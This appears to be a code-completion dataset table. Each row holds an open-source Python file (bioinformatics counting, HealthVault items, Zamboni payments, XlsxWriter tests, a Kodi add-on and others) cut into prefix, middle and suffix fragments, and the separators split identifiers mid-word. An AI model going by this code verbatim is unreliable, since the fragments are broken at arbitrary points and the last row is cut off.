repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
xujun10110/AIL-framework | bin/packages/lib_words.py | Python | agpl-3.0 | 3,335 | 0.001499 | import os
import string
from pubsublogger import publisher
import calendar
from datetime import date
from dateutil.rrule import rrule, DAILY
import csv
def listdirectory(path):
"""Path Traversing Function.
:param path: -- The absolute pathname to a directory.
This function is returning all the absolute path of the files contained in
the argument directory.
"""
fichier = []
for root, dirs, files in os.walk(path):
for i in files:
fichier.append(os.path.join(root, i))
return fichier
clean = lambda dirty: ''.join(filter(string.printable.__contains__, dirty))
"""It filters out non-printable characters from the string it receives."""
def create_dirfile(r_serv, directory, overwrite):
"""Create a file of path.
:param r_serv: -- connexion to redis database
:param directory: -- The folder where to launch the listing of the .gz files
This function create a list in redis with inside the absolute path
of all the pastes needed to be proceeded by function using parallel
(like redis_words_ranking)
"""
if overwrite:
r_serv.delete("filelist")
for x in listdirectory(directory):
r_serv.lpush("filelist", x)
publisher.info("The list was overwritten")
else:
if r_serv.llen("filelist") == 0:
for x in listdirectory(directory):
r_serv.lpush("filelist", x)
publisher.info("New list created")
else:
for x in listdirectory(directory):
r_serv.lpush("filelist", x)
publisher.info("The list was updated with new elements")
def create_curve_with_word_file(r_serv, csvfilename, feederfilename, year, month):
"""Create a csv file used with dygraph.
:param r_serv: -- connexion to redis database
:param csvfilename: -- the path to the .csv file created
:param feederfilename: -- the path to the file which contain a list of words.
:param year: -- (integer) The year to process
:param month: -- (integer) The month to process
This function create a .csv file using datas in redis.
It's checking if the words contained in feederfilename and
their respectives values by days exists. If these values are missing
(Word not present during a day) it's will automatically put a 0
to keep the timeline of the curve | correct.
"""
first_day = date(year, month, 01)
last_day = date(year, month, calendar.monthrange(year, | month)[1])
words = []
with open(feederfilename, 'rb') as f:
# words of the files
words = sorted([word.strip() for word in f])
headers = ['Date'] + words
with open(csvfilename+'.csv', 'wb') as f:
writer = csv.writer(f)
writer.writerow(headers)
# for each days
for dt in rrule(DAILY, dtstart=first_day, until=last_day):
row = []
curdate = dt.strftime("%Y%m%d")
row.append(curdate)
# from the 1srt day to the last of the list
for word in words:
value = r_serv.hget(word, curdate)
if value is None:
row.append(0)
else:
# if the word have a value for the day
row.append(value)
writer.writerow(row)
|
Cyberbio-Lab/bcbio-nextgen | bcbio/rnaseq/count.py | Python | mit | 2,271 | 0.001321 | """
count number of reads mapping to features of transcripts
"""
import os
import sys
import itertools
import pandas as pd
import gffutils
from bcbio.utils import file_exists
from bcbio.distributed.transaction import file_transaction
from bcbio.log | import log | ger
from bcbio import bam
import bcbio.pipeline.datadict as dd
def combine_count_files(files, out_file=None, ext=".fpkm"):
"""
combine a set of count files into a single combined file
"""
assert all([file_exists(x) for x in files]), \
"Some count files in %s do not exist." % files
for f in files:
assert file_exists(f), "%s does not exist or is empty." % f
col_names = [os.path.basename(x.replace(ext, "")) for x in files]
if not out_file:
out_dir = os.path.join(os.path.dirname(files[0]))
out_file = os.path.join(out_dir, "combined.counts")
if file_exists(out_file):
return out_file
for i, f in enumerate(files):
if i == 0:
df = pd.io.parsers.read_table(f, sep="\t", index_col=0, header=None,
names=[col_names[0]])
else:
df = df.join(pd.io.parsers.read_table(f, sep="\t", index_col=0,
header=None,
names=[col_names[i]]))
df.to_csv(out_file, sep="\t", index_label="id")
return out_file
def annotate_combined_count_file(count_file, gtf_file, out_file=None):
dbfn = gtf_file + ".db"
if not file_exists(dbfn):
return None
if not gffutils:
return None
db = gffutils.FeatureDB(dbfn, keep_order=True)
if not out_file:
out_dir = os.path.dirname(count_file)
out_file = os.path.join(out_dir, "annotated_combined.counts")
# if the genes don't have a gene_id or gene_name set, bail out
try:
symbol_lookup = {f['gene_id'][0]: f['gene_name'][0] for f in
db.features_of_type('exon')}
except KeyError:
return None
df = pd.io.parsers.read_table(count_file, sep="\t", index_col=0, header=0)
df['symbol'] = df.apply(lambda x: symbol_lookup.get(x.name, ""), axis=1)
df.to_csv(out_file, sep="\t", index_label="id")
return out_file
|
rajeevs1992/pyhealthvault | src/healthvaultlib/itemtypes/height.py | Python | mit | 2,163 | 0.001387 | from lxml import etree
from healthvaultlib.itemtypes.healthrecorditem import HealthRecordItem
from healthvaultlib.utils.xmlutils import XmlUtils
class Height(HealthRecordItem):
def __init__(self, thing_xml=None):
super(Height, self).__init__()
self.type_id = '40750a6a-89b2-455c-bd8d-b420a4cb500b'
self.when = None
self.display_value = None
self.display_units = None
self.value_m = None
if thing_xml is not None:
self.thing_xml = thing_xml
self.parse_thing()
def __str__(self):
if self.display_value is not None:
return ("%f%s" % (self.display_value, self.display_unit))
else:
return ("%f%s" % (self.value_m, 'm'))
def parse_thing(self):
super(Height, self).parse_thing()
if self.thing_xml.xpath('data-xml') != []:
xmlutils = XmlUtils(self.thing_xml)
when_node = self.thing_xml.xpath('data-xml/height/when')
if len(when_node) > 0:
self.when = xmlutils.get_datetime_from_when(when_node[0])
self.value_m = xmlutils.get_float_by_xpath('data-xml/height/value/m/text()')
self.display_value = xmlutils.get_float_by_xpath('data-xml/height/value/display/text()')
self.display_unit = xmlutils.get_string_by_xpath('data-xml/height/value/display/@units')
else:
self.is_partial = True
def write_xml(self):
thing = supe | r(Height, self).write_xml()
data_xml = etree.Element('data-xml')
height = etree.Element('height')
| height.append(self.get_when_node('when', self.when))
value = etree.Element('value')
m = etree.Element('m')
m.text = str(self.value_m)
value.append(m)
if self.display_value is not None and self.display_units is not None:
display = etree.Element('display')
display.text = str(self.display_value)
display.set('units', self.display_units)
value.append(display)
height.append(value)
data_xml.append(height)
thing.append(data_xml)
return thing
|
pvtodorov/indra | indra/benchmarks/assembly_eval/combine4/run_combined.py | Python | bsd-2-clause | 1,490 | 0 | import os
import csv
import pickle
from indra.literature import id_lookup
from indra.sources import trips, reach, index_cards
from assembly_eval import have_file, run_assembly
if __name__ == '__main__':
pmc_ids = [s.strip() for s in open('pmcids.txt', 'rt').readlines()]
# Load the REACH reading output
with open('reach/reach_stmts_batch_4_eval.pkl') as f:
reach_stmts = pickle.load(f)
# Load the PMID to PMCID map
pmcid_to_pmid = {}
with open('pmc_batch_4_id_map.txt') as f:
csvreader = csv.reader(f, delimiter='\t')
for row in csvreader:
pmcid_to_pmid[row[0]] = row[1]
for pmcid in pmc_ids:
print 'Processing %s...' % pmcid
# Process TRIPS
trips_fname = 'trips/' + pmcid + '.ekb'
| tp = trips.process_xml(open(trips_fname).read())
# Get REACH statements
reach_stmts_for_pmcid = reach_stmts.get(pmcid_to_pmid[pmcid], [])
if not re | ach_stmts_for_pmcid:
print "No REACH statements for %s" % pmcid
# Get NACTEM/ISI statements
fname = 'nactem/' + pmcid + '.cards'
if not os.path.exists(fname):
nactem_stmts = []
else:
icp = index_cards.process_json_file(fname, 'nactem')
nactem_stmts = icp.statements
# Combine all statements
all_statements = tp.statements + reach_stmts_for_pmcid + nactem_stmts
# Run assembly
run_assembly(all_statements, 'combined', pmcid)
|
chromium/chromium | third_party/blink/renderer/bindings/scripts/web_idl/typedef.py | Python | bsd-3-clause | 1,678 | 0 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from .code_generator_info import CodeGeneratorInfo
from .composition_parts import WithCodeGeneratorInfo
from .composition_parts import WithComponent
from .composition_parts import WithDebugInfo
from .composition_parts import WithIdentifier
from .ir_map import IRMap
from .make_copy import make_copy
class Typedef(WithIdentifier, WithCodeGeneratorInfo, WithComponent,
WithDebugInfo):
"""https://webidl.spec.whatwg.org/#idl-typedefs"""
class IR(IRMap.IR, WithCodeGeneratorInfo, WithComponent, WithDebugInfo):
def __init__(self,
identifier,
idl_type,
code_generator_info=None,
component=None,
debug_info=None):
IRMap.IR.__init__(
self, identifier=identifier, kind=IRMap.IR.Kind.TYPEDEF)
WithCodeGeneratorInfo.__init__(self, code_generator_info)
WithComponent.__init__(self, component)
WithDebugInfo.__init__(self, debug_info)
self.idl_type = idl_type
def __init__(self, ir):
assert isinstance(ir, Typedef.IR)
ir = make_copy(ir)
WithIdentifier.__init__(self, ir)
WithCodeGeneratorInfo.__init__(self, ir, readonly=True)
WithComponent.__init__(self, ir, readonly=True)
WithDebugInfo.__init__(self, ir)
self._idl_type = ir.idl_t | ype
@property
def idl_type(self):
"""Returns the typedef'ed type."""
return self._idl_typ | e
|
mscuthbert/abjad | abjad/tools/labeltools/label_leaves_in_expr_with_numbered_intervals.py | Python | gpl-3.0 | 1,783 | 0 | # -*- encoding: utf-8 -*-
from abjad.tools import scoretools
from abjad.tools import scoretools
from abjad.tools import markuptools
from abjad.tools import scoretools
from abjad.tools import pitchtools
from abjad.tools.topleveltools import attach
from abjad.tools.topleveltools import iterate
def label_leaves_in_expr_with_numbered_intervals(expr, markup_direction=Up):
r"""Label leaves in `expr` with numbered intervals:
::
>>> notes = scoretools.make_notes(
... [0, | 25, 11, -4, -14, -13, 9, 10, 6, 5],
... [Duration(1, 8)],
... )
>>> staff = Staff(notes)
>>> labeltools.la | bel_leaves_in_expr_with_numbered_intervals(staff)
.. doctest::
>>> print(format(staff))
\new Staff {
c'8 ^ \markup { +25 }
cs'''8 ^ \markup { -14 }
b'8 ^ \markup { -15 }
af8 ^ \markup { -10 }
bf,8 ^ \markup { +1 }
b,8 ^ \markup { +22 }
a'8 ^ \markup { +1 }
bf'8 ^ \markup { -4 }
fs'8 ^ \markup { -1 }
f'8
}
::
>>> show(staff) # doctest: +SKIP
Returns none.
"""
for note in iterate(expr).by_class(scoretools.Note):
logical_voice_iterator = iterate(note).by_logical_voice_from_component(
scoretools.Leaf,
)
try:
next(logical_voice_iterator)
next_leaf = next(logical_voice_iterator)
if isinstance(next_leaf, scoretools.Note):
mci = pitchtools.NumberedInterval.from_pitch_carriers(
note, next_leaf)
markup = markuptools.Markup(mci, markup_direction)
attach(markup, note)
except StopIteration:
pass
|
luckylavish/zamboni | mkt/developers/views_payments.py | Python | bsd-3-clause | 20,258 | 0 | import functools
import json
import urllib
from django import http
from django.conf import settings
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.http import require_POST
import commonware
import jinja2
import waffle
from slumber.exceptions import HttpClientError
from tower import ugettext as _
from waffle.decorators import waffle_switch
import mkt
from lib.crypto import generate_key
from lib.pay_server import client
from mkt.access import acl
from mkt.constants import PAID_PLATFORMS, PLATFORMS_NAMES
from mkt.constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR, PROVIDER_BANGO,
PROVIDER_CHOICES)
from mkt.developers import forms, forms_payments
from mkt.developers.decorators import dev_required
from mkt.developers.models import CantCancel, PaymentAccount, UserInappKey
from mkt.developers.providers import get_provider, get_providers
from mkt.inapp.models import InAppProduct
from mkt.inapp.serializers import InAppProductForm
from mkt.prices.models import Price
from mkt.site.decorators import json_view, login_required, use_master
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.devhub')
@dev_required
@require_POST
def disable_payments(request, addon_id, addon):
return redirect(addon.get_dev_url('payments'))
@dev_required(owner_for_post=True, webapp=True)
def payments(request, addon_id, addon, webapp=False):
premium_form = forms_payments.PremiumForm(
request.POST or None, request=request, addon=addon,
user=request.user)
region_form = forms.RegionForm(
request.POST or None, product=addon, request=request)
upsell_form = forms_payments.UpsellForm(
request.POST or None, addon=addon, user=request.user)
providers = get_providers()
if 'form-TOTAL_FORMS' in request.POST:
formset_data = request.POST
else:
formset_data = None
account_list_formset = forms_payments.AccountListFormSet(
data=formset_data,
provider_data=[
{'addon': addon, 'user': request.user, 'provider': provider}
for provider in providers])
if request.method == 'POST':
active_forms = [premium_form, region_form, upsell_form]
if formset_data is not None:
active_forms.append(account_list_formset)
success = all(form.is_valid() for form in active_forms)
if success:
region_form.save()
try:
premium_form.save()
except client.Error as err:
success = False
log.error('Error setting payment information (%s)' % err)
messages.error(
request, _(u'We encountered a problem connecting to the '
u'payment server.'))
raise # We want to see these exceptions!
is_free_inapp = addon.premium_type == mkt.ADDON_FREE_INAPP
is_now_paid = (addon.premium_type in mkt.ADDON_PREMIUMS or
is_free_inapp)
# If we haven't changed to a free app, check the upsell.
if is_now_paid and success:
try:
if not is_free_inapp:
upsell_form.save()
if formset_data is not None:
account_list_formset.save()
except client.Error as err:
| log.error('Error saving payment information (%s)' % err)
messages.error(
request, _(u'We en | countered a problem connecting to '
u'the payment server.'))
success = False
raise # We want to see all the solitude errors now.
# If everything happened successfully, give the user a pat on the back.
if success:
messages.success(request, _('Changes successfully saved.'))
return redirect(addon.get_dev_url('payments'))
# TODO: refactor this (bug 945267)
android_pay = waffle.flag_is_active(request, 'android-payments')
desktop_pay = waffle.flag_is_active(request, 'desktop-payments')
# If android payments is not allowed then firefox os must
# be 'checked' and android-mobile and android-tablet should not be.
invalid_paid_platform_state = []
if not android_pay:
# When android-payments is off...
invalid_paid_platform_state += [('android-mobile', True),
('android-tablet', True),
('firefoxos', False)]
if not desktop_pay:
# When desktop-payments is off...
invalid_paid_platform_state += [('desktop', True)]
cannot_be_paid = (
addon.premium_type == mkt.ADDON_FREE and
any(premium_form.device_data['free-%s' % x] == y
for x, y in invalid_paid_platform_state))
try:
tier_zero = Price.objects.get(price='0.00', active=True)
tier_zero_id = tier_zero.pk
except Price.DoesNotExist:
tier_zero = None
tier_zero_id = ''
# Get the regions based on tier zero. This should be all the
# regions with payments enabled.
paid_region_ids_by_name = []
if tier_zero:
paid_region_ids_by_name = tier_zero.region_ids_by_name()
platforms = PAID_PLATFORMS(request)
paid_platform_names = [unicode(platform[1]) for platform in platforms]
provider_regions = {}
if tier_zero:
provider_regions = tier_zero.provider_regions()
return render(request, 'developers/payments/premium.html',
{'addon': addon, 'webapp': webapp, 'premium': addon.premium,
'form': premium_form, 'upsell_form': upsell_form,
'tier_zero_id': tier_zero_id, 'region_form': region_form,
'PLATFORMS_NAMES': PLATFORMS_NAMES,
'is_paid': (addon.premium_type in mkt.ADDON_PREMIUMS or
addon.premium_type == mkt.ADDON_FREE_INAPP),
'cannot_be_paid': cannot_be_paid,
'paid_platform_names': paid_platform_names,
'is_packaged': addon.is_packaged,
# Bango values
'account_list_forms': account_list_formset.forms,
'account_list_formset': account_list_formset,
# Waffles
'api_pricelist_url': reverse('price-list'),
'payment_methods': {
PAYMENT_METHOD_ALL: _('All'),
PAYMENT_METHOD_CARD: _('Credit card'),
PAYMENT_METHOD_OPERATOR: _('Carrier'),
},
'provider_lookup': dict(PROVIDER_CHOICES),
'all_paid_region_ids_by_name': paid_region_ids_by_name,
'providers': providers,
'provider_regions': provider_regions,
'enabled_provider_ids':
[acct.payment_account.provider
for acct in addon.all_payment_accounts()]
})
@login_required
@json_view
def payment_accounts(request):
app_slug = request.GET.get('app-slug', '')
if app_slug:
app = Webapp.objects.get(app_slug=app_slug)
app_name = app.name
else:
app_name = ''
accounts = PaymentAccount.objects.filter(
user=request.user,
provider__in=[p.provider for p in get_providers()],
inactive=False)
def account(acc):
def payment_account_names(app):
account_names = [unicode(acc.payment_account)
for acc in app.all_payment_accounts()]
return (unicode(app.name), account_names)
addon_payment_accounts = acc.addonpaymentaccount_set.all()
associated_apps = [apa.addon
for apa in addon_payment_accounts
if hasattr(apa, 'addon')]
|
jkyeung/XlsxWriter | xlsxwriter/test/comparison/test_chart_title01.py | Python | bsd-2-clause | 1,535 | 0 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2016, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'chart_title01.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + ' | xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""Test the creation of an XlsxWriter file with default title."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_workshe | et()
chart = workbook.add_chart({'type': 'column'})
chart.axis_ids = [46165376, 54462720]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'values': '=Sheet1!$A$1:$A$5',
'name': 'Foo'})
chart.set_title({'none': True})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
|
google/tf-quant-finance | tf_quant_finance/__init__.py | Python | apache-2.0 | 3,356 | 0.006853 | # Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TensorFlow Quantitative Finance."""
import sys
# We need to put some imports inside a function call below, and the function
# call needs to come before the *actual* imports that populate the
# tf_quant_finance namespace. Hence, we disable this lint check throughout
# the file.
#
# pylint: disable=g-import-not-at-top
# Update this whenever we need to depend on a newer TensorFlow release.
_REQUIRED_TENSORFLOW_VERSION = "2.3" # pylint: disable=g-statement-before-imports
# Ensure Python 3 is used.
def _check_py_version():
if sys.version_info[0] < 3:
raise Exception("Please use Python 3. Python 2 is not supported.")
# Ensure TensorFlow is importable and its version is sufficiently recent. This
# needs to happen before anything else, since the imports below will try to
# import tensorflow, too.
def _ensure_tf_install(): | # pylint: disable=g-statement-before-imports
"""Attempt to import tensorflow, and ensure its version is sufficient.
Raises:
ImportError: if either tensorflow is not importable or its version is
inadequate.
"""
try:
import tensorflow.compat.v2 as tf
except ImportError:
# Print | more informative error message, then reraise.
print("\n\nFailed to import TensorFlow. Please note that TensorFlow is not "
"installed by default when you install TF Quant Finance library. "
"This is so that users can decide whether to install the GPU-enabled "
"TensorFlow package. To use TF Quant Finance library, please install "
"the most recent version of TensorFlow, by following instructions at "
"https://tensorflow.org/install.\n\n")
raise
import distutils.version
if (distutils.version.LooseVersion(tf.__version__) <
distutils.version.LooseVersion(_REQUIRED_TENSORFLOW_VERSION)):
raise ImportError(
"This version of TF Quant Finance library requires TensorFlow "
"version >= {required}; Detected an installation of version {present}. "
"Please upgrade TensorFlow to proceed.".format(
required=_REQUIRED_TENSORFLOW_VERSION, present=tf.__version__))
_check_py_version()
_ensure_tf_install()
from tf_quant_finance import black_scholes
from tf_quant_finance import datetime
from tf_quant_finance import experimental
from tf_quant_finance import math
from tf_quant_finance import models
from tf_quant_finance import rates
from tf_quant_finance import types
from tf_quant_finance import utils
from tensorflow.python.util.all_util import remove_undocumented # pylint: disable=g-direct-tensorflow-import
_allowed_symbols = [
"black_scholes",
"datetime",
"experimental",
"math",
"models",
"rates",
"types",
"utils",
]
remove_undocumented(__name__, _allowed_symbols)
|
ferriman/SSandSP | processing/spiritOfBCN/getdata.py | Python | gpl-3.0 | 4,690 | 0.042857 | import random
perc2015 = []
perc2016 = []
perc2017 = []
perc2018 = []
perc2019 = []
def getColor(pais):
foundColor = 0
theColor = 0x000000
for elem in perc2015:
if elem[0]==pais:
theColor = elem[2]
foundColor = 1
for elem in perc2016:
if elem[0]==pais:
theColor = elem[2]
foundColor = 1
for elem in perc2017:
if elem[0]==pais:
theColor = elem[2]
foundColor = 1
for elem in perc2018:
if elem[2]==pais:
theColor = elem[2]
foundColor = 1
for elem in perc2019:
if elem[2]== | pais:
theColor = elem[2]
foundColor = 1
if foundColor == 0:
theColor = "%06x" % random.randint(0, 0xFFFFFF)
return theColor
total = 0
with open('2015_naixements_lloc-de-naixement.c | sv') as data:
for line in data:
fields = line.split(",")
#print(line)
#print(fields[len(fields)-1],fields[len(fields)-2])
found = 0
total = total + int(fields[len(fields)-1])
for elem in perc2015:
if elem[0] == fields[len(fields)-2].replace('"',''):
elem[1] = elem[1] + int(fields[len(fields)-1])
found = 1
if found == 0:
color = getColor(fields[len(fields)-2].replace('"',''))
perc2015.append([fields[len(fields)-2].replace('"',''),int(fields[len(fields)-1]),color])
total = 0
with open('2016_naixements_lloc-de-naixement.csv') as data:
for line in data:
fields = line.split(",")
#print(line)
#print(fields[len(fields)-1],fields[len(fields)-2])
found = 0
total = total + int(fields[len(fields)-1])
for elem in perc2016:
if elem[0] == fields[len(fields)-2].replace('"',''):
elem[1] = elem[1] + int(fields[len(fields)-1])
found = 1
if found == 0:
color = getColor(fields[len(fields)-2].replace('"',''))
perc2016.append([fields[len(fields)-2].replace('"',''),int(fields[len(fields)-1]),color])
total = 0
with open('2017_naixements_lloc-de-naixement.csv') as data:
for line in data:
fields = line.split(",")
#print(line)
#print(fields[len(fields)-1],fields[len(fields)-2])
found = 0
total = total + int(fields[len(fields)-1])
for elem in perc2017:
if elem[0] == fields[len(fields)-2].replace('"',''):
elem[1] = elem[1] + int(fields[len(fields)-1])
found = 1
if found == 0:
color = getColor(fields[len(fields)-2].replace('"',''))
perc2017.append([fields[len(fields)-2].replace('"',''),int(fields[len(fields)-1]),color])
total = 0
with open('2018_naixements_lloc-de-naixement.csv') as data:
for line in data:
fields = line.split(",")
#print(line)
#print(fields[len(fields)-1],fields[len(fields)-2])
found = 0
total = total + int(fields[len(fields)-1])
for elem in perc2018:
if elem[0] == fields[len(fields)-2].replace('"',''):
elem[1] = elem[1] + int(fields[len(fields)-1])
found = 1
if found == 0:
color = getColor(fields[len(fields)-2].replace('"',''))
perc2018.append([fields[len(fields)-2].replace('"',''),int(fields[len(fields)-1]),color])
total = 0
with open('2019_naixements_lloc-de-naixement.csv') as data:
for line in data:
fields = line.split(",")
#print(line)
#print(fields[len(fields)-1],fields[len(fields)-2])
found = 0
total = total + int(fields[len(fields)-1])
for elem in perc2019:
if elem[0] == fields[len(fields)-2].replace('"',''):
elem[1] = elem[1] + int(fields[len(fields)-1])
found = 1
if found == 0:
color = getColor(fields[len(fields)-2].replace('"',''))
perc2019.append([fields[len(fields)-2].replace('"',''),int(fields[len(fields)-1]),color])
#print(perc2015)
with open("dataOutput2015.csv", "w") as data:
data.write("fecha,pais,numero,color\n");
for elem in perc2015:
print(elem[0],elem[1],elem[2],total)
data.write("2015,"+elem[0]+","+str((float(elem[1])/float(total))*100.0)+","+elem[2]+"\n")
with open("dataOutput2016.csv", "w") as data:
data.write("fecha,pais,numero,color\n");
for elem in perc2016:
print(elem[0],elem[1],elem[2],total)
data.write("2016,"+elem[0]+","+str((float(elem[1])/float(total))*100.0)+","+elem[2]+"\n")
with open("dataOutput2017.csv", "w") as data:
data.write("fecha,pais,numero,color\n");
for elem in perc2017:
print(elem[0],elem[1],elem[2],total)
data.write("2017,"+elem[0]+","+str((float(elem[1])/float(total))*100.0)+","+elem[2]+"\n")
with open("dataOutput2018.csv", "w") as data:
data.write("fecha,pais,numero,color\n");
for elem in perc2018:
print(elem[0],elem[1],elem[2],total)
data.write("2018,"+elem[0]+","+str((float(elem[1])/float(total))*100.0)+","+elem[2]+"\n")
with open("dataOutput2019.csv", "w") as data:
data.write("fecha,pais,numero,color\n");
for elem in perc2019:
print(elem[0],elem[1],elem[2],total)
data.write("2019,"+elem[0]+","+str((float(elem[1])/float(total))*100.0)+","+elem[2]+"\n")
|
turbidsoul/isort | sort.py | Python | mit | 556 | 0.003597 | import sublime
import sublime_plugin
from isort.isort import SortImports
class PysortCommand(sublime | _plugin.TextCommand):
def run(self, edit):
old_content = self.view.substr(sublime.Region(0, self.view.size()))
| new_content = SortImports(file_contents=old_content).output
self.view.replace(edit, sublime.Region(0, self.view.size()), new_content)
sublime.status_message("Python sort import complete.")
sublime.run_command('sub_notify', {'title': 'ISort', 'msg': 'Python sort import complete.', 'sound': False})
|
AMOboxTV/AMOBox.LegoBuild | script.extendedinfo/resources/lib/WindowManager.py | Python | gpl-2.0 | 12,611 | 0.000793 | # -*- coding: utf8 -*-
# Copyright (C) 2015 - Philipp Temminghoff <phil65@kodi.tv>
# This program is Free Software see LICENSE file for details
from Utils import *
import xbmc
import xbmcaddon
import xbmcgui
import xbmcvfs
import os
from dialogs import BaseClasses
from LocalDB import local_db
import TheMovieDB
ADDON = xbmcaddon.Addon()
ADDON_ID = ADDON.getAddonInfo('id')
ADDON_ICON = ADDON.getAddonInfo('icon')
ADDON_NAME = ADDON.getAddonInfo('name')
ADDON_PATH = ADDON.getAddonInfo('path').decode("utf-8")
INFO_DIALOG_FILE_CLASSIC = u'script-%s-DialogVideoInfo.xml' % (ADDON_NAME)
LIST_DIALOG_FILE_CLASSIC = u'script-%s-VideoList.xml' % (ADDON_NAME)
ACTOR_DIALOG_FILE_CLASSIC = u'script-%s-DialogInfo.xml' % (ADDON_NAME)
if SETTING("force_native_layout") == "true":
INFO_DIALOG_FILE = u'script-%s-DialogVideoInfo-classic.xml' % (ADDON_NAME)
LIST_DIALOG_FILE = u'script-%s-VideoList-classic.xml' % (ADDON_NAME)
ACTOR_DIALOG_FILE = u'script-%s-DialogInfo-classic.xml' % (ADDON_NAME)
path = os.path.join(ADDON_PATH, "resources", "skins", "Default", "1080i")
if not xbmcvfs.exists(os.path.join(path, INFO_DIALOG_FILE)):
xbmcvfs.copy(strSource=os.path.join(path, INFO_DIALOG_FILE_CLASSIC),
strDestnation=os.path.join(path, INFO_DIALOG_FILE))
if not xbmcvfs.exists(os.path.join(path, LIST_DIALOG_FILE)):
xbmcvfs.copy(strSource=os.path.join(path, LIST_DIALOG_FILE_CLASSIC),
strDestnation= | os.path.join(path, LIST_DIALOG_FILE))
if not xbmcvfs.exists(os.path.join(path, ACTOR_DIAL | OG_FILE)):
xbmcvfs.copy(strSource=os.path.join(path, ACTOR_DIALOG_FILE_CLASSIC),
strDestnation=os.path.join(path, ACTOR_DIALOG_FILE))
else:
INFO_DIALOG_FILE = INFO_DIALOG_FILE_CLASSIC
LIST_DIALOG_FILE = LIST_DIALOG_FILE_CLASSIC
ACTOR_DIALOG_FILE = ACTOR_DIALOG_FILE_CLASSIC
class WindowManager(object):
window_stack = []
def __init__(self):
self.reopen_window = False
self.last_control = None
self.active_dialog = None
if SETTING("window_mode") == "true":
self.window_type = BaseClasses.WindowXML
else:
self.window_type = BaseClasses.DialogXML
def add_to_stack(self, window):
"""
add window / dialog to global window stack
"""
self.window_stack.append(window)
def pop_stack(self):
"""
get newest item from global window stack
"""
if self.window_stack:
self.active_dialog = self.window_stack.pop()
xbmc.sleep(300)
self.active_dialog.doModal()
elif self.reopen_window:
xbmc.sleep(600)
xbmc.executebuiltin("Action(Info)")
if self.last_control:
xbmc.sleep(50)
xbmc.executebuiltin("SetFocus(%s)" % self.last_control)
def open_movie_info(self, prev_window=None, movie_id=None, dbid=None,
name=None, imdb_id=None):
"""
open movie info, deal with window stack
"""
xbmc.executebuiltin("ActivateWindow(busydialog)")
from dialogs import DialogMovieInfo
if not movie_id:
movie_id = TheMovieDB.get_movie_tmdb_id(imdb_id=imdb_id,
dbid=dbid,
name=name)
movie_class = DialogMovieInfo.get_window(self.window_type)
dialog = movie_class(INFO_DIALOG_FILE,
ADDON_PATH,
id=movie_id,
dbid=dbid)
xbmc.executebuiltin("Dialog.Close(busydialog)")
self.open_dialog(dialog, prev_window)
def open_tvshow_info(self, prev_window=None, tmdb_id=None, dbid=None,
tvdb_id=None, imdb_id=None, name=None):
"""
open tvshow info, deal with window stack
"""
xbmc.executebuiltin("ActivateWindow(busydialog)")
from dialogs import DialogTVShowInfo
if tmdb_id:
pass
elif tvdb_id:
tmdb_id = TheMovieDB.get_show_tmdb_id(tvdb_id)
elif imdb_id:
tmdb_id = TheMovieDB.get_show_tmdb_id(tvdb_id=imdb_id,
source="imdb_id")
elif dbid and (int(dbid) > 0):
tvdb_id = local_db.get_imdb_id(media_type="tvshow",
dbid=dbid)
if tvdb_id:
tmdb_id = TheMovieDB.get_show_tmdb_id(tvdb_id)
elif name:
tmdb_id = TheMovieDB.search_media(media_name=name,
year="",
media_type="tv")
tvshow_class = DialogTVShowInfo.get_window(self.window_type)
dialog = tvshow_class(INFO_DIALOG_FILE,
ADDON_PATH,
tmdb_id=tmdb_id,
dbid=dbid)
xbmc.executebuiltin("Dialog.Close(busydialog)")
self.open_dialog(dialog, prev_window)
def open_season_info(self, prev_window=None, tvshow_id=None,
season=None, tvshow=None, dbid=None):
"""
open season info, deal with window stack
needs *season AND (*tvshow_id OR *tvshow)
"""
xbmc.executebuiltin("ActivateWindow(busydialog)")
from dialogs import DialogSeasonInfo
if not tvshow_id:
params = {"query": tvshow,
"language": SETTING("language")}
response = TheMovieDB.get_data(url="search/tv",
params=params,
cache_days=30)
if response["results"]:
tvshow_id = str(response['results'][0]['id'])
else:
params = {"query": re.sub('\(.*?\)', '', tvshow),
"language": SETTING("language")}
response = TheMovieDB.get_data(url="search/tv",
params=params,
cache_days=30)
if response["results"]:
tvshow_id = str(response['results'][0]['id'])
season_class = DialogSeasonInfo.get_window(self.window_type)
dialog = season_class(INFO_DIALOG_FILE,
ADDON_PATH,
id=tvshow_id,
season=season,
dbid=dbid)
xbmc.executebuiltin("Dialog.Close(busydialog)")
self.open_dialog(dialog, prev_window)
def open_episode_info(self, prev_window=None, tvshow_id=None, season=None,
episode=None, tvshow=None, dbid=None):
"""
open season info, deal with window stack
needs (*tvshow_id OR *tvshow) AND *season AND *episode
"""
from dialogs import DialogEpisodeInfo
